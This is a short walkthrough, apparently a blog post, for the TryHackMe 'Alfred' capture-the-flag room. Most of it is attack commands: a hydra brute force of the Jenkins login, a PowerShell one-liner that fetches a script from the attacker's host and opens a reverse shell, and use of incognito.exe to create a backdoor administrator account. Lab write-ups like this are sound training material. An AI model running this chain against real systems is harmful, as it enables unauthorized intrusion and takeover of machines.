TryHackMe — Alfred w/o MSF

Clarence Subia

Sep 6, 2020·3 min read

Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

[1]NMAP Scan

sudo nmap -A -T4 10.10.131.184 -oN nmap_alfred

[2]Visit Webpage

http://10.10.131.184:8080

[3]Brute force login page

Capture login traffic using burpsuite:

Brute form http-post-form using hydra:

Parameters for Hydra:

URL: /j_acegi_security_check
USER = j_username
PASS = j_password
Port = 8080
Invalid login message = Invalid username or password

hydra -s 8080 10.10.131.184 http-form-post “/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid username or password” -L user.txt -P rockyou.txt -t 10 -w 30

[4]Login to webpage using gathered credentials

[5]Setup a python web server and netcat listener on kali

[6]Download and run Invoke-PowerShellTcp.ps1 to target machine

powershell iex (New-Object Net.WebClient).DownloadString(‘http://10.11.17.48:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.17.48 -Port 1337

[6]Escalate privilege

whoami /priv

[7]Exploit SeImpersonatePrivilege using incognito.exe

powershell “(New-Object System.Net.WebClient).Downloadfile(‘http://10.11.17.48:8000/incognito.exe','incognito.exe')"

./incognito.exe add_user dummy pass123

./incognito.exe add_localgroup_user Administrators dummy

[8]Login to RDP using dummy account

rdesktop -u dummy -p pass123 10.10.131.184

run cmd as Administrator

References:

https://tryhackme.com/room/alfred

https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip